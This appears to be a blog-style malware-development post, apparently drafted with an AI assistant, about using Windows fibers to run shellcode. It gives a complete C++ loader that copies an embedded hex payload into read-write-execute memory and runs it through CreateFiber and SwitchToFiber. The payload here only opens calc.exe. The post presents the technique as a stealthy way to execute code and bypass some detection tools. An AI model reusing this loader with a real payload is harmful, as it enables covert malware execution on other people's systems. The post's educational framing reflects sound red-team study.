What are Windows Fibers?
Fibers are lightweight units of execution that run within the context of a thread. Unlike threads (which are scheduled by the OS), fibers must be manually scheduled by the application. Think of fibers as cooperative multitasking within a single thread.
Fibers allow a program to manually switch execution between multiple execution paths (fibers) in a controlled manner, making them ideal for crafting stealthy execution chains.
📚 Learn more about Windows fibers here.
//windowsfibers.cpp
#include <windows.h> // 1
unsigned char my_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; // 2
unsigned int my_payload_len = sizeof(my_payload); // 3
int main() {
PVOID f; // converted
PVOID payload_mem; // memory buffer for payload
PVOID payloadF; // fiber
// convert main thread to fiber
f = ConvertThreadToFiber(NULL);
// allocate memory buffer
payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(payload_mem, my_payload, my_payload_len);
// create a fiber that will execute payload
payloadF = CreateFiber(NULL,(LPFIBER_START_ROUTINE)payload_mem, NULL);
SwitchToFiber(payloadF);
return 0;
}Explanation
🧬 Code Breakdown
f = ConvertThreadToFiber(NULL);- Converts the current main thread into a fiber so that it can call
SwitchToFiberlater. Without this, the thread can’t switch to another fiber.
payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(payload_mem, my_payload, my_payload_len);-
Allocates memory using
VirtualAllocwith executable permissions. -
Copies the shellcode (
my_payload) into that buffer.
payloadF = CreateFiber(NULL, (LPFIBER_START_ROUTINE)payload_mem, NULL);
SwitchToFiber(payloadF);-
A new fiber is created with the entry point set to the shellcode.
-
SwitchToFiberjumps execution to the shellcode — in this case, it openscalc.exe.
🧪 Behavior
The payload is classic calc.exe shellcode, commonly used for demonstration. When run, the program will spawn the Windows Calculator — a clear signal the injection worked.
⚠️ Ethical Note
This technique is for educational and research purposes only. It demonstrates how alternate thread control structures (like Fibers) can be abused to execute arbitrary code and bypass some detection tools.
🏷️ Suggested Tags (Quartz/Obsidian Compatible)
Use - instead of spaces to avoid tag errors:
tags:
- code-injection
- shellcode-execution
- windows-fibers
- fiber-api
- malware-development
- red-team
- offensive-security
- cplusplus
- winapi
- ethical-hacking
- reverse-engineeringIf malware-development is being rejected, use a safer alternative like:
-
maldev -
offensive-techniques -
post-exploitation
Would you like an image/diagram that explains the flow visually? Or a social card (Open Graph) preview template for this post?